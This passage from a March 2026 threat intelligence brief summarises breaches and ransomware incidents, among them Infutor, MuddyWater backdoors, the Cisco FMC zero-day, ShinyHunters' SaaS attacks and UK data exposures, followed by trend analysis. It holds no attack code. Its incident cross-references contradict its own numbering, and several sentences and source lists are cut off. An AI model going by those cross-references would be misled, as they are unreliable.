Sources: BleepingComputer, TechRadar, Cybersecurity Dive, The Register, Hackread, CSO Online, CBC News, The Globe and Mail, CloudTweaks, Breached.Company, Bitdefender, SafeState, Prism News, MobileSyrup, Bloomberg, Yahoo Finance, Google Cloud Blog (Mandiant), FINRA, UpGuard, The Hacker News, Resecurity, Obsidian Security, LevelBlue, DataBreaches.Net, CPO Magazine, Outsource Accelerator, Simply Wall St, Wikipedia

Full Analysis: https://zerotolerance.me/cyberthreats/telus-digital-shinyhunters-1pb

16. Infutor: 676 Million Records Including SSNs Exposed via Misconfigured Elasticsearch

USA | Spirigatito | March 8, 2026

security explicitly disabled exposed 676,798,866 consumer identity records (91.72 GB) including full Social Security numbers.

SOCRadar discovered the exposure on March 3; threat actor Spirigatito posted the full dataset on BreachForums on March 8-9, explicitly crediting SOCRadar's article for finding the open instance.

Data attributed to Infutor - a data broker sold by Verisk ($223.5M acquisition) to ActiveProspect in January 2026, eight weeks before discovery.

This is the largest PII exposure of 2026 by record count and is particularly notable because Elasticsearch 8.0+ enables security by default - meaning someone explicitly disabled it. Neither Infutor, Verisk, nor ActiveProspect has responded publicly.

Three law firms are investigating class actions. No breach notifications have been filed and no credit monitoring has been offered to the 676 million affected individuals, most of whom have no relationship with and no awareness of Infutor.

. Records: 676,798,866 (91.72 GB) - SSNs, DOBs, names, address histories, phones

. Vector: Elasticsearch 8.15.2 with security explicitly disabled

. Actor: Spirigatito (posted to BreachForums)

. Ownership: Infutor - Verisk (2022) - ActiveProspect (Jan 2026)

. Status: No company response; 3 law firms investigating; no breach notifications filed

Sources: SOCRadar, Biometric Update, Prism News, DailyDarkWeb, DarkNetSearch, DataBreach.io, ClassAction.org, Class Action U, Chimicles Schwartz Kriner & Donaldson-Smith LLP, Dark Web Informer, HackNotice, CYFIRMA, Verisk Newsroom, ActiveProspect, GlobeNewsWire, Inc.

Full Analysis: https://zerotolerance.me/cyberthreats/infutor-676m-ssn-exposure

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

17. Salford City College: DragonForce Exfiltrates 256GB Including Mental Health Records

United Kingdom | DragonForce + Qilin (cartel alliance) | March 6, 2026

DragonForce ransomware cartel claims exfiltration of 256.92 GB from Salford City College (~8,981 learners, 4,480 aged 16-18), including confidential mental health assessment forms and personal information spreadsheets.

Dual-listed by both DragonForce (March 6) and Qilin (March 10) under the DragonForce-Qilin-LockBit cartel alliance. The college confirmed "IT disruption" but issued no public breach statement.

Mental health records for students aged 16-18 constitute special category data under UK GDPR Article 9 with additional protections under Recital 38 (children's data).

DragonForce has approximately 430-440 victims since late 2023 and was responsible for the M&S GBP 300M attack; 4 NCA arrests occurred in July 2025. Only 37% of UK further education colleges have dedicated cybersecurity staff - a statistic that helps explain why 85% have experienced a breach in the past 12 months.

. Data: 256.92 GB (mental health records, personal data, administrative documents)

. Target: ~8,981 learners across 5 campuses (4,480 aged 16-18)

. Actor: DragonForce (~430-440 victims) + Qilin (dual-listed under cartel alliance)

. Sector: UK Further Education (85% of FE colleges breached in past 12 months)

Sources: FalconFeeds, Comparitech, DailyDarkWeb, DeXpose, Ransomware.live, RedPacket Security, Netcrook, Breachsense, Naomi Korn Associates, SentinelOne, Group-IB, Trend Micro, LevelBlue, Acronis TRU, Darktrace, Picus Security, BleepingComputer, The Hacker News, Dark Reading, Computer Weekly, Infosecurity Magazine, Help Net Security, BlackFog, UK Gov Cyber Security Breaches Survey 2025, Jisc, NCSC, Ofsted

Full Analysis: https://zerotolerance.me/cyberthreats/dragonforce-salford-city-college

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

18. MuddyWater Pre-Positions Dindoor and Fakeset Backdoors on US Bank, Airport, Defense Networks

USA / Israel / Canada | MuddyWater / Seedworm / MOIS | March 5, 2026

Iran's MuddyWater pre-positioned two novel backdoors on the networks of a US bank, a US airport, a US defense software company with Israeli operations, and two non-profit organizations in the US and Canada.

The intrusions began in early February 2026 - weeks before the February 28 US-Israeli military strikes - meaning Iranian intelligence had established persistent access to US critical infrastructure before hostilities commenced.

Symantec's Broadcom Threat Hunter Team published its findings on March 5, warning that other organizations could still be vulnerable.

The Dindoor backdoor leverages the Deno JavaScript/TypeScript runtime to evade detection calibrated for PowerShell and Python. The Fakeset backdoor uses Python delivered from Backblaze B2 cloud storage with data exfiltration via Rclone to Wasabi cloud buckets.

Both were signed with code-signing certificates previously linked to MuddyWater malware by Google, Microsoft, and Kaspersky.

This pre-positioning operation, combined with concurrent Handala operations, establishes that Iran's MOIS was running multiple distinct cyber campaigns simultaneously against US targets.

. Victims: US bank, US airport, US defense software company (Israeli operations), Canadian and US non-profits

. Actor: MuddyWater / Seedworm (MOIS-linked)

. Backdoors: Dindoor (Deno-based, novel) and Fakeset (Python-based)

. Pre-Positioning: Intrusions began early February 2026 - before February 28 airstrikes

. C2: Sliver framework on port 31337

. Exfiltration: Rclone to Wasabi cloud storage

Sources: Symantec/Broadcom Threat Hunter Team, Check Point Research, The Register, The Hacker News, SecurityWeek, Help Net Security, Infosecurity Magazine, Security Affairs, Cybernews, SOCRadar, Krypt3ia, Shodan, crt.sh, WHOIS/RDAP

Full Analysis: https://zerotolerance.me/cyberthreats/muddywater-dindoor-fakeset-us-infrastructure

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

19. Interlock Ransomware Exploits Cisco FMC Zero-Day (CVE-2026-20131) - CVSS 10.0

USA / Global | Interlock (Hive0163) | January 26 - March 4, 2026

Interlock ransomware exploited CVE-2026-20131 - a critical insecure deserialization flaw (CWE-502, CVSS 10.0) in Cisco Secure Firewall Management Center and Security Cloud Control - for 36 days before Cisco's March 4 disclosure.

Unauthenticated RCE as root via crafted serialized Java objects. Affects 69+ FMC versions (6.4.0.13 through 10.0.0); no fix for 6.x (EOL); no workarounds.

Amazon MadPot identified the campaign after discovering a misconfigured Interlock server exposing the group's complete toolkit organized by victim. Companion CVE-2026-20079 (auth bypass, CVSS 10.0) was patched simultaneously.

Post-disclosure, Zscaler detected exploitation by additional actors using public PoC code.

Interlock (100+ victims, suspected Rhysida spinoff) deployed AI-generated malware (Slopoly), a BYOVD EDR-killer (Hotta Killer), and multi-layered persistence including JS RAT, Java RAT, memory-resident webshell, and ScreenConnect.

This is the second edge device zero-day in this brief alongside the F5 BIG-IP reclassification, reinforcing that network security appliance management planes are now a primary attack surface.

. CVE: CVE-2026-20131 (CVSS 10.0, CWE-502) + CVE-2026-20079 (CVSS 10.0)

. Zero-Day Window: 36 days (Jan 26 - Mar 4, 2026)

. Affected: FMC 6.4.0.13-10.0.0 (69+ versions) + Cisco SCC. No workarounds.

. Actor: Interlock / Hive0163 (100+ victims; suspected Rhysida spinoff)

. CISA: KEV catalog March 19; marked for ransomware use

. Exposure: ~300-700 internet-facing FMC instances (Censys/FOFA)

Sources: Cisco PSIRT (cisco-sa-fmc-rce-NKhnULJh), NVD (CVE-2026-20131), CISA KEV Catalog, CISA/FBI Advisory AA25-203A, AWS Security Blog, The Hacker News, Help Net Security, The Register, The Record, CSO Online, Security Affairs, BleepingComputer, Zscaler ThreatLabz, Qualys ThreatPROTECT, IBM X-Force, Sekoia, Arctic Wolf, Penligent, Purple Ops, FortiGuard Labs, VulnCheck, ransomware.live, Censys, FOFA

Full Analysis: https://zerotolerance.me/cyberthreats/interlock-cisco-fmc-cve-2026-20131

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

20. AkzoNobel: Anubis Ransomware Steals 170GB - Passports, Client Agreements, Financial Records

EU (Netherlands / USA) | Anubis | March 1, 2026

Dutch multinational AkzoNobel - the world's third-largest paint and coatings producer (EUR 10.2B revenue, 34,600 employees) - confirmed hackers breached one of its US facilities. Anubis ransomware claimed responsibility, exfiltrating approximately 170,000 files (170GB).

Published samples include passport scans, confidential client agreements, employee and financial records, email correspondence, and technical specification sheets.

AkzoNobel serves Boeing, Airbus, BAE Systems, and the US military - leaked technical specs may include ITAR-controlled data.

The breach occurs during a pending $25B all-stock merger with Axalta Coating Systems.

Anubis (65 victims since December 2024) operates a unique three-tier affiliate model and explicitly threatens to report breaches to regulatory bodies including the EDPB, ICO, and HHS. Maximum GDPR fine exposure is EUR 406M (4% of EUR 10.158B revenue).

. Data Stolen: 170GB (~170,000 files)

. Data Types: Passport scans, client agreements, financial records, technical specs

. Actor: Anubis ransomware (65 victims; three-tier RaaS model)

. Scope: US site; pending $25B Axalta merger

. GDPR Fine Exposure: Up to EUR 406M

Sources: BleepingComputer, TechRadar, Cybernews, Check Point Research, CySecurity News, SC Media, FalconFeeds, DeXpose, Prism News, RedPacket Security, DWM Magazine, USGlass Magazine, ransomware.live, Trend Micro, KELA Cyber, Sophos (Secureworks), Proven Data, Picus Security, AkzoNobel Investor Relations

Full Analysis: https://zerotolerance.me/cyberthreats/akzonobel-anubis-ransomware

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

21. Infinite Campus: ShinyHunters Breach K-12 Platform Serving 11M Students via 10-Minute Vishing Attack

USA | ShinyHunters | March 18, 2026

ShinyHunters breached Infinite Campus - the largest privately held K-12 student information system in the US, serving 3,200+ school districts and 11 million students across 46 states - through a 10-minute voice phishing attack on a single offsite employee.

The attacker impersonated IT support, relayed credentials in real time to bypass MFA, and accessed the company's Salesforce instance. Within 10 minutes, Infinite Campus detected and ejected the attacker.

Only Salesforce directory data (staff names and contact information) was accessed - no student records, no education data, no SSNs. ShinyHunters posted a ransom threat with a March 25 deadline; Infinite Campus refused to engage. No data has been published.

. Data accessed: Staff directory information (names, contact details) from Salesforce

. NOT compromised: Student records, education data, SSNs, SIS platform

. Detection time: 10 minutes

. Actor: ShinyHunters (UNC6240) - part of systematic Salesforce vishing campaign

. Platform: 11M students, 3,200+ districts, 46 states

Sources: BleepingComputer, Cybernews, TechRadar, DataBreaches.net, CyberInsider, Prism News, Security Boulevard, SC Media, UpGuard, RedPacket Security, K12TechPro, ClaimDepot, Migliaccio & Rathod LLP, Netcrook, Dark Web Informer, Orange County Schools (NC DPI), Privacy Guides, Rankiteo, Mitiga, Varonis, Google Cloud Blog (Mandiant), AppOmni, Infinite Campus (FERPA Policy), US Department of Education (PTAC), FTC (COPPA Rule 2025)

Full Analysis: https://zerotolerance.me/cyberthreats/infinite-campus-shinyhunters-k12-breach

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

22. Intoxalock: Cyberattack Bricks 150,000 Court-Mandated DUI Devices Across 46 States for 8 Days

USA | Unknown | March 14, 2026

A cyberattack on Consumer Safety Technology (d/b/a Intoxalock) disabled backend calibration systems for approximately 150,000 court-mandated ignition interlock devices across 46 states.

For 8 days (March 14-22), drivers in court-ordered DUI monitoring programs could not calibrate their devices, causing lockouts and undriveable vehicles. Named plaintiff was fired after his device locked him out, his car shut off while driving, and he incurred $1,000+ in towing.

Class action filed March 26 (S.D. Iowa). Intoxalock collects uniquely sensitive data: breath alcohol levels, GPS coordinates, facial photographs, court case numbers. No federal cybersecurity standards exist for interlock vendors.

. Affected: ~150,000 users across 46 states

. Outage: 8 days (March 14-22, 2026)

. Data at risk: BAC measurements, GPS, facial photos, court records

. Legal: Curry v. Consumer Safety Technology LLC (4:2026cv00134)

. Company: L Catterton portfolio company, ~$136M revenue

Company, ByteIota, CEO Outlook, Technology.org, DysruptionHub, Justia (Curry v.

Full Analysis: https://zerotolerance.me/cyberthreats/intoxalock-cyberattack-dui-interlock-devices-bricked

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

23. UK Companies House: Browser Back Button Exposes 5.43M Companies' Directors' Protected Data for 152 Days

UK | Software vulnerability | March 13, 2026

A broken access control flaw in the Companies House WebFiling service - introduced during the October 2025 GOV.UK One Login migration - let any authenticated user access any company's private dashboard by pressing the browser back button four times.

Directors' residential addresses (statutorily suppressed under Companies Act 2006 Section 240), full dates of birth, and filing capabilities were exposed for 152 days (October 13, 2025 - March 13, 2026).

Discovered by John Hewitt (Ghost Mail), escalated by Dan Neidle (Tax Policy Associates). Service shut down for 67.5 hours. ICO and NCSC notified. Companies House holds ISO 27001 and PCI DSS certifications.

. Exposed: 5.43M companies' directors' DOBs and protected addresses

. Exposure window: 152 days

. Vulnerability: IDOR + session management failure (OWASP A01:2021)

. Regulatory: ICO investigation ongoing

Sources: GOV.UK (Companies House), Tax Policy Associates (Dan Neidle), The Register, Help Net Security, BleepingComputer, Cybersecurity News, Computer Weekly, SecurityWeek, UpGuard, ACCA Global, GB News, Cybersecurity Intelligence, CyberPress, SC Media, Digit.fyi, Punchline Gloucester, Bright SG, Elemental CoSec, Morris Owen, Virtual Company Secretary, Companies House Annual Report 2024-2025, GOV.UK One Login

Full Analysis: https://zerotolerance.me/cyberthreats/uk-companies-house-webfiling-broken-access-control

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

24. Crunchyroll: 6.8M Users Exposed After Infostealer Compromises TELUS Support Agent's Okta Credentials

USA | Unattributed (SLSH ecosystem assessed) | March 12, 2026

A threat actor breached Crunchyroll - the Sony-owned anime streaming platform (17M paid subscribers, 120M registered users, 200+ countries) - by compromising the Okta SSO credentials of a TELUS Digital support agent in India via infostealer malware.

The attacker accessed 7 internal systems over a multi-day period, exfiltrating 6.8 million email addresses from 8 million support tickets, plus 100GB of internal data. A $5M ransom was demanded; a subset was listed by user "hubert" for $2K on BreachForums.

Attribution is disputed: BleepingComputer was told the attacker is separate from ShinyHunters, but the attack occurred via a TELUS agent workstation during ShinyHunters' concurrent TELUS breach, and the infostealer-via-phishing TTP matches ShinyHunters' earlier Snowflake campaign playbook.

Crunchyroll does not appear on ShinyHunters' Tor leak site, suggesting at minimum a peripheral operator rather than core ShinyHunters. Assessed as likely SLSH ecosystem-affiliated. Sony ($1.175B Crunchyroll acquisition) inherits liability.

. Data stolen: 6.8M emails, support tickets, 100GB internal data

. Ransom: $5M demanded

. Vector: Infostealer malware on TELUS agent workstation

. 7 systems accessed

. Sony GDPR exposure: up to 4% of $88.7B revenue (~$3.5B theoretical max)

Sources: BleepingComputer, TechCrunch, The Record, TechRadar, Cybernews, CyberSecurity News, CX Today, The CyberSec Guru, Netcrook, Screen Rant, Prism News, Insurance Journal, Anime Corner, AnimeMojo, GIGAZINE, Beebom, Anime News Network, TopClassActions, Cyber Daily, SC Media, WebProNews, Cyberpress, Privacy Guides, ResetEra, GameSpot (Sony acquisition), Hollywood Reporter (Sony acquisition)

Full Analysis: https://zerotolerance.me/cyberthreats/crunchyroll-telus-okta-shinyhunters-breach

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

25. Lloyds Banking Group: API Race Condition Exposes 447,936 Customers' NI Numbers in 4-Hour Mobile App Failure

UK | Software defect | March 12, 2026

A software defect in an overnight API update broke transaction isolation across the Lloyds, Halifax, and Bank of Scotland mobile apps for 4 hours 40 minutes (03:28-08:08 GMT).

When two customers requested transactions within fractions of a second, the API returned the wrong customer's data. Of 447,936 customers exposed, 114,182 clicked into erroneous transactions and viewed sort codes, account numbers, and National Insurance numbers.

No cyberattack - pure engineering failure during a performance optimization. " GBP 139,000 paid to 3,625 complainants (avg GBP 38). FCA and ICO investigations active.

. Exposed: 447,936 customers; 114,182 viewed others' NI numbers

. Data: Sort codes, account numbers, National Insurance numbers

. Duration: 4h40m (03:28-08:08 GMT, March 12)

. Compensation: GBP 139,000 to 3,625 complainants

. Lloyds FY2025: GBP 19.4B total income, 30M customers

Sources: UK Parliament Treasury Committee, The Register, TechRadar, Computing.co.uk, Hackread, Cyber Magazine, SecurityWeek, Cybernews, Computer Weekly, Infosecurity Magazine, MoneySavingExpert, FinTech Magazine, Retail Banker International, Scottish Financial News, Scottish Legal News, Signature Litigation, GB News, Bloomberg, Lloyds Banking Group 2025 Annual Results, FCA (Operational Resilience, SM&CR, Consumer Duty, TSB Final Notice), ICO, Simply Wall St, Dataproof, WebProNews

Full Analysis: https://zerotolerance.me/cyberthreats/lloyds-banking-group-api-race-condition-data-exposure

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

26. Aura: Identity Protection Company Breached by ShinyHunters - 903K Records Stolen via Vishing

USA | ShinyHunters | March 11, 2026

ShinyHunters breached Aura - a Boston-based identity protection company ($1.6B valuation, ~$216M standalone ARR) - through targeted vishing of an employee. 903,100 records exfiltrated per Have I Been Pwned.

However, approximately 865,000 records were legacy Circle Media Labs marketing contacts acquired in December 2021 that had been sitting on a legacy platform for five years. Fewer than 20,000 active customers had addresses and phone numbers exposed.

The structural irony - an identity protection company breached - is significant, but the actual customer impact is limited. Aura detected and revoked access within approximately one hour.

. Records exposed: 903,100 (865K legacy Circle Media Labs data)

. Active customers affected: <20,000

. Detection time: ~1 hour

. Actor: ShinyHunters (UNC6240)

. Company: $1.6B valuation, $216M standalone ARR

Sources: BleepingComputer, Help Net Security, SecurityWeek, Bitdefender, CyberInsider, Gizmodo, Tom's Guide, Cybernews, Have I Been Pwned, Aura Official Statement (March 17 2026), Aura Security Incident Update (March 19 2026), CyberScoop, Google Threat Intelligence Group (Mandiant), Silent Push, Resecurity, ReliaQuest, Picus Security, Flare, ClaimDepot, Shamis & Gentile, Migliaccio & Rathod, PRNewswire (Circle Media Labs acquisition), VentureBeat (Aura Series F), Aura Investor Relations (Series G-II, Qoria acquisition)

Full Analysis: https://zerotolerance.me/cyberthreats/aura-identity-protection-shinyhunters-breach

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

27. Woflow: SaaS Supply Chain Breach Exposes Walmart, DoorDash, Uber, and Deliveroo - 326GB Published

USA | ShinyHunters | March 3, 2026

ShinyHunters breached Woflow Inc. - a San Francisco-based AI merchant data platform ($10.8M funding, ~26 employees) serving as the data infrastructure layer for Walmart, DoorDash, Uber, and Deliveroo.

A 326GB compressed archive was published after ransom refusal, containing SSNs, driver's licenses, financial accounts, credit cards, merchant onboarding data, and OAuth2 access/refresh tokens.

DoorDash's exposure is doubled via its $3.9B acquisition of Deliveroo (September 2025). Class action filed (N.D. ). As of March 31, 2026 - 28 days post-breach - Woflow has issued zero public statements, zero breach notifications, and zero state AG filings.

. Data published: 326GB - SSNs, financial data, OAuth tokens

. Clients exposed: Walmart, DoorDash, Uber, Deliveroo

. Actor: ShinyHunters (UNC6240)

. Legal: Suhr v. Woflow Inc. (3:26-cv-02161, N.D. Cal.)

. Silence: 28 days, zero notifications

. GDPR exposure: Up to ~$549M (4% of DoorDash $13.7B revenue)

Sources: Cybernews, SC Media, Security Boulevard, BrinzTech, SecurityBrief, AppOmni, ClassAction.org, Class Action U, Mason LLP (Mason & Perry), Migliaccio & Rathod LLP, Justia (Suhr v. Woflow Inc.

Full Analysis: https://zerotolerance.me/cyberthreats/woflow-shinyhunters-supply-chain-breach-walmart-doordash-uber-deliveroo

28. INTERPOL Operation Synergia III: 45,000 Malicious IPs Dismantled, 94 Arrested Across 72 Countries

Global | INTERPOL + 72 Member States | March 13, 2026

INTERPOL coordinated the largest international cyber takedown operation of 2026, dismantling 45,000 malicious IP addresses and arresting 94 individuals across 72 countries between November 2025 and March 2026. Operation Synergia III targeted phishing infrastructure, infostealer operations, and ransomware command-and-control servers.

Private sector partners Group-IB, S2W, and Team Cymru provided threat intelligence. This represents a 3,361% increase from Synergia I (1,300 IPs in 2023) and a 105% increase from Synergia II (22,000 IPs in 2024).

. Scale: 45,000+ malicious IPs taken down, 94 arrested, 72 countries

. Regional: Macau shut down 33,000+ malicious domains, Bangladesh arrested 40 suspects, Togo arrested 10

. Partners: Group-IB, S2W, Team Cymru (Kaspersky excluded between Synergia II and III)

. MENA participation: Bahrain, Iraq, Jordan, Kuwait, Lebanon, Oman, Qatar, UAE (Saudi Arabia notably absent)

. Concurrent: SocksEscort residential proxy service dismantled (369,000 compromised routers, $3.5M crypto seized)

. Context: Largest coordinated cyber law enforcement operation of 2026 to date

Sources: INTERPOL, The Register, Help Net Security, Hackread, Infosecurity Magazine, SecurityAffairs, Security MEA, Group-IB, BleepingComputer, The Record, ScamWatchHQ, TechNadu, Computer Weekly, Sahara Reporters, Europol (SocksEscort), International Enforcement Law Reporter, CPO Magazine, Capital FM Kenya, CXO Insight Middle East, Intelligent CISO, TechAfrica News, BackBox.org, Cyberwarzone, Archyde, Red Packet Security, The Edvocate, IBTimes UK, The420.in, Yahoo News

Full Analysis: https://zerotolerance.me/cyberthreats/interpol-synergia-iii-takedown-2026

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

29. Passaic County, NJ: Medusa Ransomware Disables Government Services for 526,000 Residents

USA | Medusa (Frozen Spider) | March 4, 2026

Medusa ransomware knocked out all IT systems and phone lines across Passaic County, New Jersey - a county government serving 526,000 residents across 16 municipalities.

County offices in Paterson went dark on March 4. Medusa claimed credit on March 17 alongside two other public-sector targets (Cape May County NJ and Lehigh Carbon Community College PA), demanding $800,000 by end of March.

This is the same Medusa operation that shut down all 35 clinics at the University of Mississippi Medical Center for nine days with the identical $800,000 demand.

. Residents: ~526,000 across 16 municipalities

. Ransom: $800,000 (identical to UMMC demand)

. Systems: All county phone lines and IT systems disabled

. Timeline: March 4 attack, March 17 Medusa claim, March 18 partial restoration

. Investigation: FBI and NJ Office of Homeland Security and Preparedness involved

. Pattern: Same actor, same ransom, same month as UMMC - coordinated public-sector campaign

. Notifications: No breach notification letters sent to residents as of late March

Sources: The Record, Comparitech, SC Media, NJ 101.5 (nj1015.com), Patch.com, ABC7 New York, DysruptionHub, TAPinto, FalconFeeds.io, Daily Voice, The Ridgewood Blog, CISA Advisory AA25-071A, Secureworks, Symantec, Barracuda, Check Point, The Hacker News, SecurityWeek, Infosecurity Magazine, KPMG, Ransomware.live, DeXpose, SWK Technologies, GiaSpace, Rankiteo

Full Analysis: https://zerotolerance.me/cyberthreats/passaic-county-medusa-ransomware-2026

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Supply Chain Attacks - Worst Month on Record (Incidents 01, 02, 07, 12, 13, 29)

March 2026 may be the worst month for software supply chain attacks in history. The Axios npm hijack (100M weekly downloads, 80% of cloud environments) demonstrated that a single stolen maintainer token can weaponize the most ubiquitous HTTP library in the JavaScript ecosystem.

TeamPCP's three-link credential chain from Trivy through LiteLLM to Telnyx introduced WAV steganography and ICP blockchain C2. GlassWorm deployed a self-propagating worm across 433 components spanning VSCode, GitHub, and npm using Solana blockchain C2. And ShinyHunters' breach of Woflow - a 26-employee SaaS vendor - exposed Walmart, DoorDash, Uber, and Deliveroo in a single attack, demonstrating that SaaS supply chains are as dangerous as software supply chains.

Four independent supply chain campaigns targeted developer and enterprise infrastructure simultaneously. The npm ecosystem alone saw two major incidents (Axios and TeamPCP) in the same month.

Every organization running CI/CD pipelines or integrating third-party SaaS APIs was in the blast radius.

Iran Cyber Escalation - Four Fronts, Multiple MOIS Groups (Incidents 08, 11, 15, 17, 20)

Iran's Ministry of Intelligence and Security ran the most operationally diverse cyber campaign month in its history.

MuddyWater pre-positioned backdoors on US critical infrastructure before hostilities began (espionage), Handala published the FBI Director's personal emails (information warfare), NasirSecurity compromised Gulf energy supply chain vendors (strategic intelligence), and Handala doxxed 28 Lockheed Martin engineers in Israel with death threats (intimidation).

These are not isolated incidents - they represent coordinated multi-domain operations by an intelligence service using at least three distinct operational groups simultaneously.

The fabricated 375TB APT IRAN claim alongside Handala's verified operations demonstrates a two-track approach: noise generation for headlines and real operations for impact.

TeamPCP Supply Chain Credential Chain - Trivy to LiteLLM to Telnyx (Incidents 07, 12, 13)

A single misconfigured GitHub Actions workflow spawned the most significant software supply chain campaign of 2026. The credential chain is precise: stolen PAT from Trivy's trivy-action repository led to credentials that compromised LiteLLM on PyPI (480M downloads), which yielded the PyPI tokens used to backdoor the Telnyx SDK (730K monthly downloads).

Each link expanded the blast radius while introducing new techniques - from /proc/pid/mem credential stealing to ICP blockchain C2 to WAV audio steganography. The campaign infected 1,000+ cloud environments and demonstrated that security tooling itself is attack surface.

The chain's speed - 27 days from initial compromise to the third victim - outpaces most organizations' third-party risk assessment cycles.

Infostealer Evolution - Hardware Breakpoints and macOS ClickFix (Incidents 05, 06)

VoidStealer's hardware breakpoint technique for bypassing Chrome ABE and Infiniti Stealer's Nuitka-compiled ClickFix campaign represent the next generation of credential theft malware.

VoidStealer's approach is particularly notable: by using CPU debug registers to intercept encryption keys without writing to browser memory, it evades all existing memory integrity checks. Twelve versions in three months demonstrates MaaS development velocity.

Meanwhile, Infiniti Stealer brings the ClickFix social engineering technique to macOS with native Mach-O compilation that resists reverse engineering. Together, these two families signal that the infostealer ecosystem is innovating faster than browser security controls can adapt.

Edge Device Exploitation - F5 BIG-IP and Cisco FMC (Incidents 04, 21)

Two network security appliance management planes were actively exploited: F5 BIG-IP (CVE-2025-53521, CVSS 9.8, reclassified from DoS to RCE after five months) and Cisco FMC (CVE-2026-20131, CVSS 10.0, exploited 36 days pre-disclosure).

Both involved memory-resident webshells and tampered integrity checks. Both received CISA KEV listings.

The F5 case is particularly instructive: organizations that triaged the October 2025 advisory as "DoS-only" and deprioritized patching discovered five months later they were running unauthenticated RCE on 240,000+ exposed instances.

Advisory misclassification creates systemic risk at scale.

European Institutions Under Siege (Incident 14 plus January MDM breach)

The European Commission was breached twice in under two months - first via Ivanti EPMM zero-days in January (MDM breach), then via AWS cloud compromise in March (350GB claimed by ShinyHunters). The Commission confirmed data was taken in both incidents.

The institution responsible for drafting and enforcing GDPR cannot secure its own infrastructure. While the Commission is technically governed by Regulation (EU) 2018/1725 rather than GDPR, the credibility damage to European data protection enforcement is significant.

If the body that fines companies billions for data protection failures is itself repeatedly breached, the normative authority of GDPR is undermined.

ShinyHunters Systematic SaaS Campaign - Six Confirmed Attacks in One Month (Incidents 14, 16, 23, 28, 29 + Figure)

ShinyHunters (UNC6240) executed at least six confirmed attacks in March 2026 - the most prolific single-actor campaign since Lapsus$ in early 2022. The targets span sectors (telecom, government, education, identity protection, food delivery) but share a common playbook: vishing or credential theft to compromise SaaS platforms (Salesforce, Okta, GCP, AWS), followed by rapid data exfiltration and ransom demands.

TELUS (1PB), Woflow (326GB), EU Commission (350GB claimed), Aura (903K records), and Infinite Campus (directory data only) demonstrate that ShinyHunters treats SaaS supply chains as force multipliers - one compromised vendor exposes data from dozens of downstream customers.

The Woflow breach alone exposed Walmart, DoorDash, Uber, and Deliveroo through a single 26-employee vendor.

Note: the Crunchyroll breach (Incident 26) was attributed to a separate attacker by BleepingComputer, not ShinyHunters, despite occurring via a TELUS agent workstation during the same period.

Google/Mandiant tracks the ShinyHunters collective as the SLSH (Scattered Lapsus$ Hunters) ecosystem.

UK Data Protection Failures - Two Incidents, 5.9M Affected (Incidents 25, 27)

Two UK institutions suffered data exposure incidents in the same week: Lloyds Banking Group exposed 447,936 customers' National Insurance numbers through an API race condition, and Companies House exposed 5.43 million companies' directors' protected addresses and dates of birth through a browser back-button bypass.

Neither was a cyberattack - both were engineering failures. The Lloyds defect existed for 4 hours 40 minutes; the Companies House flaw persisted for 152 days.

Companies House holds ISO 27001 and PCI DSS certifications - both of which require access control testing that should have caught a back-button bypass. Lloyds, as the UK's largest retail bank, is subject to FCA operational resilience requirements and PRA supervisory standards.

The incidents raise serious questions about the effectiveness of compliance-driven security in UK financial and government infrastructure.

Information Operations vs Real Operations (Incident 15 vs 08, 17)

The fabricated 375TB APT IRAN Lockheed Martin claim - posted on an untracked marketplace, with zero verified samples after ten days and theatrical pricing of $598.5 million - stands in stark contrast to Handala's verified operations during the same month: a sitting FBI Director's personal emails published with DKIM verification and 28 defense engineers doxxed with genuine passport scans.

Distinguishing signal from noise in the Iranian information operations space is now itself a critical intelligence function.

The fabricated claims consume analyst time, generate media coverage, and provide plausible deniability or amplification for the real operations running in parallel.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

The following gaps exist in the public record for this threat brief:

2. TeamPCP's claimed compromise of "1,000+ SaaS environments" originates from Mandiant's RSA Conference 2026 presentation and has not been independently verified by a second research firm. The projected 10,000+ figure is an estimate, not a confirmed count.

3. The full scope of the LiteLLM compromise - specifically which organizations installed the malicious PyPI package during the exposure window and whether AI API keys were successfully harvested at scale - has not been publicly quantified.

4. No public attribution has been made for the active exploitation of F5 BIG-IP CVE-2025-53521. The connection to UNC5221's source code theft is circumstantial. Whether the source code exfiltration enabled the RCE exploitation is assessed but unconfirmed.

5. The European Commission has not disclosed whether the March AWS breach and the January MDM breach share any common attack infrastructure, credentials, or threat actor. Whether these are related campaigns or independent targeting remains unknown.

6. NasirSecurity's true operational relationship to MOIS or IRGC has not been established by any Western intelligence agency or security research firm. Resecurity assesses them as "pro-Iranian cyber-mercenaries" but the precise sponsorship model is unclear.

7. The DarkSword iOS exploit kit leaked on GitHub has not been assessed for active exploitation by commodity actors post-leak. Whether the leak has expanded targeting beyond the four originally identified countries is unknown.

8. ShinyHunters' attack vector for the Woflow breach has not been disclosed. AppOmni's assessment of OAuth token abuse is analytical, not forensic.

Whether stolen OAuth2 tokens from the 326GB archive were used to access downstream platforms (Walmart, DoorDash, Uber, Deliveroo) is unknown.

9. The nature of the Intoxalock cyberattack - ransomware, destructive, or data theft - has not been confirmed.

Whether the "vast quantities of information" alleged in the class action (BAC measurements, GPS coordinates, facial photographs, court records) were actually exfiltrated is unconfirmed.

10. Whether any unauthorized user exploited the Companies House WebFiling vulnerability during the 152-day exposure window remains unconfirmed. Log analysis is ongoing. The number of directors whose protected residential addresses were actually accessed is unknown.

